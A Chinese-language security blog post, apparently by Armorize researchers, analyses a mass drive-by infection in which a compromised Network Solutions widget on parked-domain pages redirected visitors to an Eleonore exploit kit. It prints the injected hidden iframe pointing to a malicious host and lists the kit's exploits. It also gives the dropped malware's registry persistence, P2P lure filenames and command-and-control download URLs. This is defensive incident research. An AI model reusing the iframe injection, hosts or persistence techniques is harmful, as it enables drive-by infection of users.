阿碼外傳－阿碼科技非官方中文 Blog: 新型態大規模掛馬--五十萬至五百萬寄放網域遭受感染

(作者: Chris Hsiao, Wayne Huang, Fyodor Yarochkin, Cola Lin, Jeremy (Birdman) Chiu)
第一部--事件起因
第二部--Widget被掛馬，五千多網站遭殃
第三部--大規模寄放網域掛馬，影響五十萬至五百萬網域
第四部--威脅影響範圍
第五部--威脅討論
第六部--掛馬 exploit 與惡意程式分析
附錄--相關報導

這次整個寄放網域遭大規模掛馬事件，雖然我們英文部落格先貼，但是一面研究一面貼，落落長貼了三篇，整理得並不好。現在我們在這邊重新整理一次，也為整個事件做個詳細的紀錄。

第一部--事件起因

今年初看到了駭客透過入侵多家網站代管供應商，來進行大規模惡意掛馬的事件，此事件導致數千個網站受害而淪為惡意程式供應站。而我們在想最後這一切都會被清理，而每個網站的運作也都會回到正常--但是事情似乎不是如此....

Screenshot 1
事情起因於約三個星期前，那時我們正吃力的準備今年美國駭客年會Black Hat 與 DEF CON 的演講。我們的客戶之一，賽門鐵克VeriSign部門（HackAlert負責幫他們所有擁有「VeriSign Trusted簽章」的客戶定期掃瞄掛馬），不斷地質疑我們，為何HackAlert一直將某些網域認定為「即時惡意網域」，導致這些網域因為VeriSign Trusted簽章被取消，而不斷地聯絡客服。所謂「即時惡意網域」，就是現行犯--當天正在散播有感染力的（會真的"work"的掛馬）。最後我們研究報告公開後，VeriSign 也主動發表 blog 說明，該事件起因乃 VeriSign 收到客戶反應被 VeriSign 標為惡意網頁而取消 VeriSign Trusted 簽章，但是防毒軟體卻沒有叫，因此懷疑 VeriSign 之檢測結果為誤報，此 case 才由 VeriSign 轉交阿碼處理。VeriSign目前使用HackAlert幫所有的簽章用戶掃瞄掛馬，由於規模大，預期將有助於VeriSign對掛馬威脅與趨勢之瞭解。

第二部--Widget被掛馬，五千多網站遭殃

第一次被VeriSign質疑時，當時大家都被Black Hat / DEF CON 要給的三場演講操翻了，只能很快的確定這些網頁確實都有掛馬，並具有感染力，然後將含有traceback（網頁A iframe 網頁B，網頁B javascript src 網頁C...一路下去最後掛馬放在網頁F這樣）的log寄給對方，「保證」沒有誣賴這些網域。

可是過沒多久又持續收到 VeriSignb 的質疑，因為當事的客戶質疑他們，而這些被我們標出的網域，並沒有被 Google 列為黑名單，他們用了一些防毒軟體的黑名單查，也沒有，因此強烈懷疑被 HackAlert 誤報，希望我們可以提供詳細的調查報告。我們記得當時我們在Black Hat演講結束，回答完問題後，還趕快到講師休息室上網，一方面回VeriSign的email並信心喊話--大家要相信我們--一方面也趁掛馬還在，趕快寫調查報告。

人工的調查開始後，我們很快的注意到了，感染的原因是因為網頁安裝了一個Network Solutions所提供的，名叫 "Small Business Success Index" 的Widget。這個Widget可以透過至少兩種方式來安裝到某個網頁或部落格中--透過WidgetBox所提供的 one-click 方式安裝 (如上圖Screenshot 1)，或者直接到 Network Solutions 的 growsmartbusiness.com 的網站進行安裝(如下圖Screenshot 2)。

Screenshot 2
我們很快地註冊一個Blogger的部落格帳號，然後透過WidgetBox安裝了這個Widget。就這樣，這個新的部落格立刻開始供應掛馬了。安裝該widget的方式不限於透過WidgetBox，而在那時，WidgetBox上已記錄了有 5,371個網站已經安裝了這個widget了(見 Screenshot 1)。也就是說，可能有超過五千個網站，這陣子都在散播掛馬。Hmm...

下面是我們驗証過程的幾個步驟。首先我們先到 Widgetbox然後點擊"Install Widget"的按鈕(圖Screenshot 3)，就會看到一個內含javascript的彈跳式視窗出現，按下"one-click-install"按鈕來安裝到Facebook, Blogger, Twitter, iGoogle, WordPress, LinkedIn, my Yearbook 等等。

Screenshot 3
在我們點選"Blogger"後，它有了動作--我們的armorizetest部落格現在已安裝好這個widget了:

Screenshot 4
點擊"Edit"會秀出這個widget的javascript的原始碼--它是從cdn.widgetserver.com這裡被載入的:

Screenshot 5
重新載入我們這個測試的部落格，現在我們可看到這個widget了:

Screenshot 6
這個可憐的測試的部落格現在已正式成為惡意網站了。使用HackAlert來掃瞄它，發現這個部落格確實已開始在供應惡意程式了，掛馬的路徑我們於第六部中說明。

初步結論：真是一個一個能快速讓你的網頁或部落格通通變成掛馬網站的好方法。

稍微Google了一下，我們証實了growsmallbusiness.com這個網站的確被入侵了，而且被安裝了名為r57shell (webshell)的後門，可以讓攻擊者輕鬆地來修改任何檔案並控制這個網站。可以看一下這個連結.

第三部--大規模寄放網域掛馬，影響五十萬至五百萬網域

確定 Network Solutions 的widget被感染後，我們意識到了一點：在五月時，我們曾經貼出文章，描述 boingboing.com寄放網域(parked domain)的掛馬事件。由於該網域名稱長得像大站boingboing.net，所以當時HackAlert爬到該網頁的掛馬時，我們就請同事分析並寫了一篇blog。這是我們注意到，那時這個寄放網域的掛馬，跟現在是一模一樣的，都是因為上面放了這個 widget，所以才不斷地在散播掛馬。

結果我們花了一些時間研究後，驚訝地發現，不得了，事情嚴重了--該widget被用於 Network Solutions 的預設寄放網域的頁面中。也就是說，只要是跟 Network Solutions 所註冊的網域，如果選擇了用預設的寄放網域，就立刻成為了惡意網站！

此時，為了確保我們的認定是對的，我們也用Network Solutions註冊了一個網域 armorizetest.com並且驗證它的確會供應惡意程式，以下是我們所做的:

首先我們向 Network Solutions 購買了一個網域：

然後我們使用它標準的"under construction page"來寄放：

完成了，我們現在連線到我們剛買的寄放網域，可以看到被掛馬的(惡意)Network Solutions widget。分析一下它資料流，是的，它也開始供應惡意網頁掛馬了，跟我們先前所分析到的一致。

在瀏覽過這個網頁後，主機會被安裝一個惡意程式在:C:\Documents and Settings\Administrator\Application Data\SystemProc\lsass.exe，這個SystemProc目錄為一個隱藏目錄。

而這個lsass.exe檔案被VirusTotal中的42家掃毒軟體掃瞄過後，有21家偵測為惡意。

我們在這邊準備了一個影片，可以看到整個感染的過程：

第四部--威脅影響範圍

之前並沒有這方面的研究，因此此次算是新型的大規模掛馬攻擊。此次事件的重點是，到底有多少個寄放網域正受到影響，而且在供應惡意程式呢?
根據Google，至少超過五十萬個:

根據Yahoo，多了一個零，至少有五百萬個網域:

我沒有時間來一個一個點，但是我們點了足夠的連結，足以證明他們真的同樣受到了感染，而且Google或Yahoo也確實的秀出所有的結果。Google只有列出前面45頁，而Yahoo也只會列出前100頁。所以我們無法真的看到所有每一個上面所列的網域，而要來手動驗證的話，五百萬個實在是一個很大的數目。

之後 Network Solutions 公開數據，宣稱只有十二萬寄放網域被感染。這部分我們覺得不可能，因為怎麼算都不對。Yahoo查出來寄放網域有五百萬筆，假設只有一百萬好了，那麼這一百萬之中，假設真的只有十二萬筆被感染，那麼我們在搜尋結果中，隨機的點一個結果，而該網域有包含該widget的機率，是120,000*100/1,000,000 = 12%，可是從我們的錄影中可以看出，我們雖機點了那麼多個，命中率百分之百。另一方面，我們也不太相信，他們的預設的parking網頁，會有那麼多版本，因為事實上我們根據查出來的結果，點來點去，每個網頁都一樣，也都有那個被感染的widget。

不過，不論數目多大，重點倒不是數目，而是流量--這些網葉加起來有多少流量？這個議題就牽扯到了一個很敏感的話題：域名搶註與寄放網域的商業模式（parked domain monetization）--可以參考Wikipedia的定義。Wikipedia上面引述了ICANNWiki的數據，來說明這種商業模式的市場規模：

「
根據2005年11月7日華爾街日報報導，"寄放網域的線上廣告營收，今年達6億美元，2007年將達10億美元。"
」

這需到多大的流量？很大

此外，網域註冊商似乎也靠此產生可觀的收入，CircleID報導："根據Afilias公司的Ram Mohan，前五大網域商中，有三家證實一年可靠寄放網域上的廣告產生五百至八百萬美金的營收。"

無論如何，這種商業模式的合法性一直是廣受爭議的（譬如這裡），甚至對於搜尋引擎是否應該在結果中列出寄放網域，也是一樣。有趣的是，就在我們公布Yahoo搜尋畫面後幾天，Yahoo就改了搜尋機制。現在，如果用同樣的關鍵字搜尋Yahoo，只有六筆結果。這表示幾天內，Yahoo改了搜尋機制，使得寄放網域，盡量不出現在搜尋結果當中。

在當初的英文部落格中，我們接下來寫到：「如果我們要抵制這種商業模式（我們要嗎？我們該嗎？），那麼搜尋引擎不在結果中列出寄放網域，是絕對會有幫助的。」

由於此次的研究立刻被全球媒體不斷地報導，我們在某報導的留言中，發現的一篇非常有趣的留言（Jason留）:

==========================================================
Disclosure: I'm a domainer. Let me shed some light on some misrepresentations here in your article. 1. Parked domains can often have a lot of traffic. Thousands a day quite often. One man alone, Frank Schilling, sends about 26 million uniques a month to Yahoo. Think about that for a second. 2. Search engines stopped indexing parked domains about three years ago. Armorize did not study the market very well it seems. Yes...you will find an occasional parked domain in the search engine idexes, but believe me Google, Yahoo, and MSN have done everything they can to remove parked domains from the search engines. 3. Parked domains don\'t need search engine traffic. If you cut off search engine traffic 100% to a domainer like me it would afftect me very little. In fact, search engine referrals make up less than 4% of my total traffic. My traffic comes from \"direct navigation\" or \"direct search\" as some call it. Folks just type in the domains into there address bar since I own high quality generic domains. Just like folks will type in Sex.com into their browsers they will also type other less popular domains into the address bar as well......domains like CatFood.com, RoofShingles.com, CarTires.com, etc.... all have traffic with NO search engine referrals. 4. Why would anyone suggest something like attacking Domainers by \"cutting off their revenue stream\". What the heck did we do? We had nothing to do with the malware!!! Why attack us? How misguided. That is like attacking a landlord b/c his tenants smoke marijuana. Very, very silly idea and would cause lawsuits. This is a very big industry, it\'s just that most folks just don\'t know it exists. 5. Calling sites that are developed \"legitimate domains\" means you are saying that domains that are parked are illegitimate. ICANN is getting ready to put into their new rules for registars and the UDRP that doamin parking is legitmate. Domain selling is legitimate, and much more verbage to address those that have attacked Domainers and domain parking. Domain parking is legitimate folks. Please don\'t tell us it is not, or we are not, when legally it is 100% legal and has never been illegal/illegitimate. Please get your facts straight people b/c I am offended to be painted in a negative light after having been a domainer since August 1995.....before the term even existed. Thanks!
=========================================================

我們結錄部分：「我是一位域名家，我這邊澄清一些事情。1. 寄放網域往往可已有很大的流量，一天常能到幾千（page views）。Frank Schilling（域名家，估計擁有的網域總價值五億美金）一個人一個月可以產生兩千六百萬次的獨立瀏覽。2. 搜尋引擎三年前就不索引寄放網域了。阿碼似乎不清楚這點。對，有時你可以藉由搜尋引擎查到寄放網域，可是相信我，Google、Yahoo、以及MSN都非常盡力地不讓寄放網域出現於他們的搜尋結果中。...」

當然Jason對我們有些誤會，主要是他將記者的文章當成我們講的，不過重點是，從他給該文章的留言中我們可以推論兩點：

A)寄放網域的確可以有可觀的流量！
B)我們透過搜尋引擎查出的 Network Solutions 寄放網域數，可能還是偏低的。

我們可以實際根據Network Solutions上的一個計數器，來實際瞭解，這些寄放網域加起來，究竟可以產生多少流量。

Network Solutions的標準寄放網頁，會對於來自台灣以及香港的IP，丟一個script，而這個script最後，會包含一個51.la的計數器。我們抓了一些畫面。第一，這個 script 只會被丟給來自台灣以及香港的IP，因此我們可以看到，大部分的流量也就來自台灣或香港。其中來自其他地方的，是因為該 script 與 51.la 所用的IP資料庫不一樣，因此有些被該script認定為來自台灣或香港的IP，51.la則認為來自其他地區。

那麼一天能有多少page views呢？我們來看一下，不過這邊注意到，該 script 不止 Network Solutions 的寄放網域上有，而是很多 hosting 公司的標準寄放網頁上都有。所以該計數器所記錄的，是多家寄放網域，來自台灣與香港流量的總和。

根據這個計數器，一天平均有14,073個page view。我們可以算一下，根據InternetWorldStats.com，台灣與香港的網路人口，各佔亞洲的 2% 與 0.6% ，所以加起來是 2.6%。亞洲則佔全球的 42%，也就是說，台灣與香港佔全球的2.6% * 42% = 1.1% 。

那麼，平均一天 14,073 次，除以 1.1%，就是平均一天 1,279,363 次 page views：超過一百萬！也就是說，這個計數器所統計的寄放網域流量總和，一天可能有超過一百次的瀏覽量。

這邊很有價值的觀察是，這些看似微不足道的個別寄放網域流量，當數量龐大，加總起來時，卻產生的龐大的流量。我們可以看到以下referer排行，除了前兩名寄放網域每天有三位數的流量外，前十名大部分都是個位數的。

一天超過一百萬次的瀏覽，假設 Network Solutions 佔 1/10 就好，那也是一天十萬次的流量，訪問的有掛馬的寄放網頁。更值得注意的是，這種威脅，因為不容易被注意到，所以尾巴很長。我們於五月時就已經寫 blog 說明我們於 boingbonig.com 上找到的掛馬，所以 Network Solutions 上的這隻掛馬，至少已經從五月活到現在了。可是根據 Slashdot 使用者針對我們 blog 的留言討論，很可能從去年七月，Network Solutions 的標準寄放網頁，就已經被掛馬了！如果是這樣，那麼這個掛馬除了流量大，時間又長，造成的威脅十分嚴重。
==== noc007 說 ===========
"I thought this was a known fact Network Solutions' parked pages served malware in one form or another. Back in July of last year I got some questions from an executive why the domain the company recently registered for was being blocked by the corporate web content filter. Turns out the Network Solutions parked page had an iframe that was serving malware from kolmic.com. I explained it and provided the parked page's html code with the offending code highlighted.

Doing some Google searches showed that I wasn't the only one that had noticed this."
===============

Followed by :
==== The-Blue_Clown 說 ===========
"I had the same exact experience. The only issue was I had an exec that wasn't going to be pushed around by the IT guys. She ordered the filter relaxed. I only got my way when i told her i needed all such requests in writing as she was assuming the known risk i had just finished explaining to her."
===============

第五部--威脅討論

同為大規模掛馬威脅，此種威脅有別於一般常見的大規模 SQL Injection 掛馬攻擊，譬如八月17日剛發生的，打到了 apple.com 的大規模 SQL Injection掛馬攻擊。大規模 SQL Injection 掛馬，打的範圍不容易掌握，所以常常很快曝光。感染到大型網站如 apple.com，雖然流量大，可是對方處理得也相對快，常常一天內就被清除了。相較起來，此次我們研究的大規模寄放網域掛馬，除了流量大，重點是，可以活很久，因次累積下來所造成的威脅，十分可觀。

所以這次我們觀察到的有以下幾點：

1. 寄放網域有可觀的流量。
2. 尤其數量龐大的寄放網域，所產生的總流量，十分可觀。
3. 相較常見的大規模 SQL Injection 掛馬攻擊，此種威脅由於存活期長，因此累積流量可觀，造成的受害者也相對地多。
4. 相較常見的大規模 SQL Injection 掛馬攻擊，此種威脅同為大規模，但是攻擊者所擁有的控制能力高很多。由於擁有 webshell，攻擊者可以隨時決定何時安插掛馬，何時除去掛馬等等。
5. 感染途徑可以是這次的透過 widget 的感染，也可以是直接入侵 hosting 的平台，或經由惡意廣告（malvertising）等方式。

另一觀察是，當你上了 apple.com 而你的防毒軟體發出警告，你很可能立刻花時間瞭解，是否 apple.com 被掛馬了？可是當你不小心去了一個寄放網域，而你的防毒叫了，你研究的動力大為不同--反正是寄放網域嘛！這可能也是為何此次威脅存活了這麼久的原因之一。

第六部--掛馬 exploit 與惡意程式分析

A. 掛馬路徑如下：

1. in http://armorizetest.blogspot.com,


<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script><script type="text/javascript">if (WIDGETBOX) WIDGETBOX.renderWidget('68804a4e-6a5a-444c-b0d7-efdced64bee1');</script>

2. http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js,


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"39866",urls:{runtimeBaseUrl:"http://widgetserver.com/syndication",...,markupRuntimeBaseUrl:"http://markup.widgetserver.com/syndication",...},

3. http://cdn.widgetserver.com/syndication/subscriber/Main.js?39866, code omitted

4. http://markup.widgetserver.com/syndication/get_widget.html?widget.appId=68804a4e-6a5a-444c-b0d7-efdced64bee1&widget.regId=390f0daf-4998-474c-b207-a6398f278681&widget.friendlyId=small-business-success-index&widget.name=Small%20Business%20Success%20Index&widget.token=0ed26d5a93c23a4c798d563608b7265d07481df40000012a67400851&widget.sid=2bf65a16514f760acc18c69a3420ad34&widget.vid=2bf65a16514f760acc18c69a3420ad34&widget.id=0&widget.location=http%3A%2F%2Farmorizetest.blogspot.com%2F&widget.timestamp=1281647662457&widget.serviceLevel=0&widget.provServiceLevel=1&widget.instServiceLevel=0&widget.width=160&widget.height=300&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.ua=mozilla%2F4.0%20%28compatible%3B%20msie%206.0%3B%20windows%20nt%205.1%3B%20sv1%29&widget.output=htmlcontent


<iframe style="" height="300px" frameborder="0" style="border:none;overflow:none;" width="180px" src="http://growsmartbusiness.com/widgets/widget.php"></iframe>

5. http://growsmartbusiness.com/widgets/widget.php,


...omitted...
<iframe frameborder=0 src="http://96.30.16.216:8037/exemple.com/" width=1 height=1 scrolling=no></iframe>

6. http://96.30.16.216:8037/exemple.com/, malicious code
7. http://96.30.16.216:8037/exemple.com/error.js.php, malicious code
8. http://208.86.153.68:8067/exemple.com/load.php?spl=mdac, malicious code
9. http://96.30.16.216:8037/exemple.com/?spl=2&br=MSIE&vers=6.0&s=, malicious code
10. http://96.30.16.216:8037/exemple.com/error.js.php, malicious code
11. http://96.30.16.216:8037/exemple.com/992.jar
12. http://96.30.16.216:8037/exemple.com/cbe.jar

B. 掛馬後台

掛馬後台用的工具是 Eleonore 掛馬包，version 1.3.1:

就如大部分的掛馬平台一樣，Eleonore會設法判斷來訪的瀏覽器，並餵出相對應的exploits。這個版本的Eleonore可攻擊的對象有：Adobe Reader，Java(cross-browsers)，Internet Explorer，Firefox，以及Opera。以下是其所支援的 exploits：

MDAC
MS009-02
ActiveX pack
CompareTo
JNO (JS navigator Object Code)
MS06-006
Font tags
Telnet
PDF collab.getIcon
PDF Util.Printf
PDF collab.collectEmailInfo
Java D&E
Soc pack (iframe ver)

平均感染成功率，北美 5-17% ，俄羅斯（.ur） 10-25%。

這次這個惡意掛馬後端平台也開啟了以下防偵測之功能：

一: 每一個IP只供應一次
二: 只供應給特定的瀏覽器
三: 阻擋常見線上掛馬分析服務。所以如 Wepawet 與 jsunpack等，在這個案例中都無法幫上忙。可以參考此次 Wepawet 的分析結果及 jsunpack 的分析結果。

最後，關於它所安裝的惡意程式lsass.exe本身，以下是關於它的分析(credits to Chris Hsiao):
當執行它時，它會建立下最幾個檔案:
=========================================================
%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\install.rdf
%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\chrome.manifest
%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\chrome\content\timer.xul
%USERPROFILE%\Application Data\SystemProc\lsass.exe

在註冊表中會加入以下的機碼，讓它在下次開機時有自動啟動的能力:
=========================================================
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RTHDBPL" = "%appdata%\SystemProc\lsass.exe"

它會監視以下類型的幾個瀏覽器:
=========================================================
Explorer
Opera
Chrome
Firefox

使用者若用以上的搜尋引擎會被重導到其它網站:
=========================================================
Google
Ask
Yahoo!
AOL
Bing

它會監視以下的搜尋字串，一旦找到它會根據所找到的字串跳出廣告視窗:
=========================================================
cialis
pharma
casino
finance
mortgage
insurance
gambling
health
hotel
travel
antivirus
antivir
pocker
poker
video
baby
bany
porn
golf
diet
vocations
design
graphic
football
footbal
estate
baseball
shop
books
gifts
money
spyware
credit
loans
loan
dating
ebay
myspace
virus
film
ipod
verizon
amazon
iphone
software
movie
mobile
bank
music
cars
craigslist
game
sport
medical
school
wallpaper
military
weather
twitter
fashion
spybot
trading
tramadol
yobt
flower
cigarettes
doctor
flights
airlines
comcast

它會搜尋以下的目錄是否存在:
=========================================================
C:\program files\winmx\shared\
C:\program files\tesla\files\
C:\program files\limewire\shared\
C:\program files\morpheus\my shared folder\
C:\program files\emule\incoming\
C:\program files\edonkey2000\incoming\
C:\program files\bearshare\shared\
C:\program files\grokster\my grokster\
C:\program files\icq\shared folder\
C:\program files\kazaa lite k++\my shared folder\
C:\program files\kazaa lite\my shared folder\
C:\program files\kazaa\my shared folder\

一旦找到以上的任何一個目錄，它會用下面的檔名拷貝自已(lsass.exe)到這些目錄中:
=========================================================
YouTubeGet 5.6.exe
Youtube Music Downloader 1.3.exe
WinRAR v3.x keygen [by HiXem].exe
Windows2008 keygen and activator.exe
[+ MrKey +] Windows XP PRO Corp SP3 valid-key generator.exe
Windows Password Cracker + Elar3 key.exe
[Eni0j0 team] Windows 7 Ultimate keygen.exe
Windows 2008 Enterprise Server VMWare Virtual Machine.exe
Winamp.Pro.v7.xx.PowerPack.Portable+installer.exe
Website Hacker.exe
[Eni0j0 team] Vmvare keygen.exe
VmWare 7.x keygen.exe
UT 2003 KeyGen.exe
Twitter FriendAdder 2.3.9.exe
Tuneup Ultilities 2010.exe
[antihack tool] Trojan Killer v2.9.4173.exe
Total Commander7 license+keygen.exe
Super Utilities Pro 2009 11.0.exe
Sub7 2.5.1 Private.exe
Sophos antivirus updater bypass.exe
sdbot with NetBIOS Spread.exe
[fixed]RapidShare Killer AIO 2010.exe
Rapidshare Auto Downloader 3.8.6.exe
Power ISO v4.4 + keygen milon.exe
[patched, serial not needed] PDF Unlocker v2.0.5.exePDF-XChange Pro.exe
[patched, serial not needed] PDF to Word Converter 3.4.exe
PDF password remover (works with all acrobat reader).exe
Password Cracker.exe
Norton Internet Security 2010 crack.exe
Norton Anti-Virus 2010 Enterprise Crack.exe
Norton Anti-Virus 2005 Enterprise Crack.exe
NetBIOS Hacker.exe
NetBIOS Cracker.exe
[patched, serial not need] Nero 9.x keygen.exe
Myspace theme collection.exe
MSN Password Cracker.exe
Mp3 Splitter and Joiner Pro v3.48.exe
Motorola, nokia, ericsson mobil phone tools.exe
Microsoft.Windows 7 ULTIMATE FINAL activator+keygen x86.exe
Microsoft Visual Studio KeyGen.exe
Microsoft Visual C++ KeyGen.exe
Microsoft Visual Basic KeyGen.exe
McAfee Total Protection 2010 [serial patch by AnalGin].exe
Magic Video Converter 8.exe
LimeWire Pro v4.18.3 [Cracked by AnalGin].exe
L0pht 4.0 Windows Password Cracker.exe
K-Lite Mega Codec v5.2 Portable.exe
K-Lite Mega Codec v5.2.exe
Keylogger unique builder.exe
Kaspersky Internet Security 2010 keygen.exe
Kaspersky AntiVirus 2010 crack.exe
IP Nuker.exe
Internet Download Manager V5.exe
Image Size Reducer Pro v1.0.1.exe
ICQ Hacker Trial version [brute].exe
Hotmail Hacker [Brute method].exe
Hotmail Cracker [Brute method].exe
Half-Life 2 Downloader.exe
Grand Theft Auto IV [Offline Activation + mouse patch].exe
Google SketchUp 7.1 Pro.exe
G-Force Platinum v3.7.6.exe
FTP Cracker.exe
DVD Tools Nero 10.x.x.x.exe
Download Boost 2.0.exe
Download Accelerator Plus v9.2.exe
Divx Pro 7.x version Keymaker.exe
DivX 5.x Pro KeyGen generator.exe
DCOM Exploit archive.exe
Daemon Tools Pro 4.8.exe
Counter-Strike Serial key generator [Miona patch].exe
CleanMyPC Registry Cleaner v6.02.exe
Brutus FTP Cracker.exe
Blaze DVD Player Pro v6.52.exe
BitDefender AntiVirus 2010 Keygen.exe
Avast 5.x Professional.exe
Avast 4.x Professional.exe
Ashampoo Snap 3.xx [Skarleot Group].exe
AOL Password Cracker.exe
AOL Instant Messenger (AIM) Hacker.exe
AnyDVD HD v.6.3.1.8 Beta incl crack.exe
Anti-Porn v13.x.x.x.exe
Alcohol 120 v1.9.x.exe
Adobe Photoshop CS4 crack by M0N5KI Hack Group.exe
Adobe Illustrator CS4 crack.exe
Adobe Acrobat Reader keygen.exe
Ad-aware 2010.exe
[patched, serial not needed] Absolute Video Converter 6.2-7.exe

它會嘗試連至以下連結來下載指令及更多的惡意程式:
=========================================================
http://updrandomhottys.com/update.php?sd=2010-03-23&aid=blackout
http://updrandomhottys.com/inst.php?aid=blackout

附錄--相關報導